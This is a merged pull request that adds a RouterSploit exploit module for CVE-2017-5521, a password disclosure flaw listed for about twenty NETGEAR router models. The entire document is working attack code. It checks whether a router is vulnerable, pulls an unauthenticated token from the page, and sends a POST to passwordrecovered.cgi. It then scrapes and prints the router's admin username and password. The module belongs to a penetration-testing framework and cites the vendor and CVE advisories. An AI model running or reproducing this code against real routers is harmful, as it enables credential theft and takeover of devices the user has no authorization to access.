Merge pull request #173 from 0BuRner/netgear_multi_pwd_disclosure-201701

netgear multi devices password disclosure

routersploit/modules/exploits/netgear/multi_password_disclosure-201701.py

+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    print_status,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for multiple NETGEAR routers password disclosure vulnerability.
+    If the target is vulnerable, it allows read credentials for administration user.
+    """
+    __info__ = {
+        'name': 'Netgear Multiple Vulnerabilities',
+        'description': 'Remote and Local Password Disclosure.',
+        'authors': [
+            'Simon Kenin of Trustwave SpiderLabs',  # vulnerability discovery
+            '0BuRner',  # routersploit module
+        ],
+        'references': [
+            'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911',
+            'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/',
+            'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5521',
+            'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5521',
+            'http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability'
+        ],
+        'devices': [
+            'D6220',
+            'D6400',
+            'R6200v2',
+            'R6250',
+            'R6300v2',
+            'R6400',
+            'R6700',
+            'R6900',
+            'R7000',
+            'R7100LG',
+            'R7300DST',
+            'R7900',
+            'R8000',
+            'R8300',
+            'R8500',
+            'WNDR3400v2',
+            'WNDR3400v3',
+            'WNR3500Lv2',
+            'WNDR4500v2',
+        ],
+        'limitations': [
+            "This exploit only works if 'password recovery' in router settings is OFF.",
+            "If the exploit has already been run, then it might not work anymore until device reboot."
+        ]
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+
+    def run(self):
+        if self.check():
+            print_success("Target is vulnerable")
+
+            url = "{}:{}".format(self.target, self.port)
+            response = http_request(method="GET", url=url)
+
+            if response is not None:
+                # Detect model
+                model = response.headers.get('WWW-Authenticate')[13:-1]
+
+                # Grab token if exists
+                token = self.extract_token(response.text)
+                if token is False:
+                    token = "routersploit"
+                    print_status("Token not found")
+                else:
+                    print_status("Token found: {}".format(token))
+
+                # Detect firmware version
+                url = "{}:{}/currentsetting.htm".format(self.target, self.port)
+                response = http_request(method="GET", url=url)
+                fw_version = ""
+                if response is not None and response.status_code == 200:
+                    fw_version = self.scrape(response.text, 'Firmware=', 'RegionTag').strip('\r\n')
+
+                print_status("Detected model: {} (FW: {})".format(model, fw_version))
+
+                # Exploit vulnerability
+                url = "{}:{}/passwordrecovered.cgi?id={}".format(self.target, self.port, token)
+                response = http_request(method="POST", url=url)
+
+                if response.text.find('left\">') != -1:
+                    username, password = self.extract_password(response.text)
+                    print_success('Exploit success! login: {}, password: {}'.format(username, password))
+                else:
+                    print_error("Exploit failed. Could not extract credentials. Reboot your device and try again.")
+            else:
+                print_error("Exploit failed. Could not extract credentials.")
+        else:
+            print_error("Target is not vulnerable")
+
+    @staticmethod
+    def scrape(text, start_trig, end_trig):
+        if text.find(start_trig) != -1:
+            return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
+        else:
+            return False
+
+    @staticmethod
+    def extract_token(html):
+        return Exploit.scrape(html, 'unauth.cgi?id=', '\"')
+
+    @staticmethod
+    def extract_password(html):
+        username = (repr(Exploit.scrape(html, 'Router Admin Username</td>', '</td>')))
+        username = Exploit.scrape(username, '>', '\'')
+        password = (repr(Exploit.scrape(html, 'Router Admin Password</td>', '</td>')))
+        password = Exploit.scrape(password, '>', '\'')
+        if username is False:
+            username = (Exploit.scrape(html[html.find('left\">'):-1], 'left\">', '</td>'))
+            password = (Exploit.scrape(html[html.rfind('left\">'):-1], 'left\">', '</td>'))
+
+        password = password.replace("&#35;", "#").replace("&#38;", "&")
+
+        return username, password
+
+    @mute
+    def check(self):
+        url = "{}:{}".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+
+        if response is not None:
+            header = response.headers.get('WWW-Authenticate')
+            token = self.extract_token(response.text)
+            return header is not None and 'NETGEAR' in header.upper() and token is not False  # target is vulnerable
+
+        return False  # target is not vulnerable